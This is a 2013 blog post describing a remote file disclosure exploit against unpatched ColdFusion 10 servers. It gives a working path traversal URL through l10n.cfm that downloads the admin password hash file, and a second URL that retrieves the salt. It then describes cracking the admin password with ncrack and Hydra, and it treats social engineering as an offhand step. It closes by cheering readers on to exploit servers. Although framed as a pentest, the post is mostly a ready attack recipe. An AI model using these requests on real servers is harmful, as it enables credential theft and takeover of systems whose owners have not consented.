Wednesday, December 4, 2013

ColdFusion 10 Remote File Disclosure Exploit

ColdFusion had several exploits in the past. ColdFusion 10 being the latest and stable release from Adobe it was hard to find any ready exploits.

As a part of external pentest, I had no information about the infrastructure in use, platform or installed applications. I ran Nessus as first part of network pentest and found that ColdFusion admin login page exists here: 

http://XX.XX.XX.XX/CFIDE/administrator/index.cfm

Next step is to get the version number. I got this by social engineering techniques..:)

Interestingly, ColdFusion 10 does not display its version number on the homepage now as compared to other previous versions. You need to assume it or need to get it from other means.

The Exploit

The exploit works if ColdFusion is not updated with latest patches, hotfixes and just has a raw installation. The Remote File Disclosure (RFD) allows accessing the operating system files, configuration files, logs, browsing complete server folders and CF admin password hash.

The vulnerability exists in l10n.cfm module as attribute.file parameter does not have validation for path traversal. This is pretty basic and how can Adobe miss this!!!

Vulnerable URL:

http://XX.XX.XX.XX/CFIDE/adminapi/customtags/l10n.cfm?attributes.id=it&attributes.locale=it&attributes.var=it&attributes.jscript=false&attributes.type=text/html&attributes.charset=UTF-8&thisTag.executionmode=end&thisTag.generatedContent=htp&attributes.file=../../administrator/mail/download.cfm&filename=../../../../../../../../../../../../../../coldfusion10/cfusion/lib/password.properties

Notes for successful exploits:

  • You would need to do couple of ../../ before you get onto the password hash
  • You would need to guess coldfusion home directory name
  • You might need to have some knowledge of ColdFusion folder structure. Refer it here.

Post you have access to password hash, next step is to get the Salt so you can perform rainbow table attacks.

Here's a quick reference for you on CF sensitive files. You might want to access them too.


Password Hash URL:

http://XX.XX.XX.XX/CFIDE/adminapi/administrator.cfc?method=getSalt

Having all this information, you may now want to proceed with password cracking. I used ncrack and Hydra for password cracking and it worked pretty quickly as admin password was among the common passwords.

Happy Exploiting CF 10!!! 

No comments:

Post a Comment